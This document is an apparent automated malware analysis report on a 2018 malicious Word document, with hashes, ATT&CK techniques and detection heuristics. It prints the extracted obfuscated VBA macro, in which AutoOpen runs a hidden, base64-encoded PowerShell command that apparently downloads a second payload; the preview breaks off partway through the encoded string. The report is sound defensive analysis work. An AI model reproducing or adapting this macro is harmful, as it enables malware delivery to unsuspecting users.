Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3a39ef1275746d1a…

MALICIOUS

Office (OLE)

94.0 KB Created: 2018-05-31 19:27:00 Authoring application: Microsoft Office Word First seen: 2018-06-19
MD5: f8180accb6f8ef7e2dbb7b869e3a672e SHA-1: d39047b7ceba9b41b874972d376bba3237dd5d84 SHA-256: 3a39ef1275746d1ada47d5902f0ae8c08230a38c4b0e6ff9a17050141c9bdb92
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the UrDfsT function, which utilizes the Shell function to execute a command. This command is constructed from concatenated strings, including 'powershell -WindowStyle hidden -e KAAnAH oAUAAnACsAJwB', indicating the execution of a PowerShell command with encoded arguments. The primary purpose appears to be downloading and executing a secondary payload.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17505 bytes
SHA-256: 32e61150833b7d7628bee581672035eb6d1f6cac53a4a0e7470298f684fdacf2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kjVjjkJTmifY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UrDfsT()
On Error Resume Next
Select Case KAliGjdXm
      Case 7109
         SwdKcD = 6638
         kYiof = CDbl(93502)
      Case 40931
         lBjdL = aYmQw
         jVopb = 59108
End Select
Select Case KAlNiwSX
      Case 22302
         kqnBL = 72600
         TrWFZQ = CDbl(32865)
      Case 42735
         XLFri = ktMAc
         ipiJS = 87705
End Select
UrDfsT = LPvsAbiz + Shell(BlKuzYbMYdp + Chr(vbKeyP) + dfsvp + pujLhY + pZatTZEfNTj + EawqIcrplc + HJFGl + Tpwoo + bdwfJwv + NTKSf + jDwwhzIik, BjMUu + vbHide + HccNRRqO)
Select Case KAljlkFM
      Case 50059
         iRjCO = 5565
         dYGSTj = CDbl(42767)
      Case 11192
         pKJdpC = wHWAmT
         GsRSkT = 18390
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlmZQBQ
      Case 54229
         wKudqu = 90998
         wabin = CDbl(90011)
      Case 82979
         EKlAZ = Qlmkf
         jNomL = 11332
End Select
UrDfsT
Select Case KAlMGIct
      Case 20773
         VrIoWP = 91571
         LqibR = CDbl(94354)
      Case 88661
         qGOXT = moThmi
         vhspjf = 47498
End Select
End Sub


Attribute VB_Name = "wOQbLCzHjoL"
Function dfsvp()
On Error Resume Next
Select Case KAlzoGbwZ
      Case 5257
         wowTnW = 32643
         YWlbJJ = CDbl(54997)
      Case 44055
         JUvNSj = brFOJ
         QJzpTN = 30475
End Select
mACEBHCN = "owersHeL" + "L -Wi" + "nDowsTyle h" + "idden -e KAAnAH" + "oAUAAnACsAJwB"
Select Case KAlZWzOt
      Case 25072
         japMj = 83534
         FGkdIY = CDbl(85254)
      Case 92161
         CbkFc = UpOHZk
         wzYTSv = 32496
End Select
IqzuX = "yACcAKwAnA" + "G4AJwArACcA" + "cwBhAGQAJw" + "ArACcAYQBzACc" + "AKwAnA"
Select Case KAlCawdD
      Case 81698
         qFrRd = 12811
         nIHfCG = CDbl(99888)
      Case 95244
         RCIKlF = GzfzAB
         cZnPzJ = 29939
End Select
cNREpPGYqjm = "GQAIAA9ACcAKwA" + "nACAA" + "JgAoAG4AYgA4AG4" + "AbgBiADgAKwBu" + "AGIAJwArACc" + "AOABlA"
Select Case KAlHqzMQ
      Case 23314
         sKQEzi = 51017
         fTkQlU = CDbl(96293)
      Case 13339
         mTfGPq = oMJvR
         YocTE = 38982
End Select
lzUfwurkfBF = "G4AYgA4" + "ACsAbgAnA" + "CsAJw" + "BiADgAdwAnACsAJ" + "wAtAG8AYgBq" + "AGUAYw"
Select Case KAlvDKBdH
      Case 90911
         sinJj = 5077
         whjdT = CDbl(31072)
      Case 31245
         VfdUuw = RPdXBi
         dcHvl = 92597
End Select
hwXTvOAPVw = "BuAGIAOAArA" + "G4AYgA" + "4AHQAJwArA" + "CcAbgAnACsAJw" + "BiADgAJwArAC" + "cAKQAgAHIAJw"
dfsvp = mACEBHCN + IqzuX + cNREpPGYqjm + lzUfwurkfBF + hwXTvOAPVw
End Function
Function pujLhY()
On Error Resume Next
Select Case KAlVmhIzr
      Case 91554
         bATfSo = 43642
         mASEMY = CDbl(60588)
      Case 23045
         rnDEV = iUCAs
         MvEsfo = 56500
End Select
warWY = "ArACcAYQBuAG" + "QAJwAr" + "ACcAbwBtAD" + "sAegBQA"
Select Case KAlVQVGc
      Case 41387
         TrVzGV = 13362
         EriFc = CDbl(77961)
      Case 21759
         odDaE = LhjCH
         aRzbzc = 22031
End Select
QwWQUqsIT = "HIAWQAnACsAJwBZ" + "AFUAIAAnACsA" + "JwA9ACAAL" + "gAoAG" + "4AYgA4AG4"
Select Case KAlhDmaFn
      Case 98708
         wiBQK = 1696
         cZvqEj = CDbl(77242)
      Case 26524
         Oahmu = Fzdji
         rdUQPK = 70391
End Select
ViYTJzHYzcz = "AZQAnA" + "CsAJwBuA" + "GIAOAArA" + "G4AJwArACcAY" + "gAnACsAJ" + "wA4ACcAKwAnA" + "HcAJwArACc"
Select Case KAlArVZk
      Case 39221
         ElGvs = 79749
         LiGMGq = CDbl(55831)
      Case 3458
         bSwlva = pVDNDX
         HCaDB = 25786
End Select
jXjwXGIhE = "AbgAnACsAJwBi" + "ADgAKw" + "BuAGIAOAAt" + "AG8AYgBqAGUAYw" + "B0ACcAKwA" + "nAG4AJ"
pujLhY = warWY + QwWQUqsIT + ViYTJzHYzcz + jXjwXGIh
... (truncated)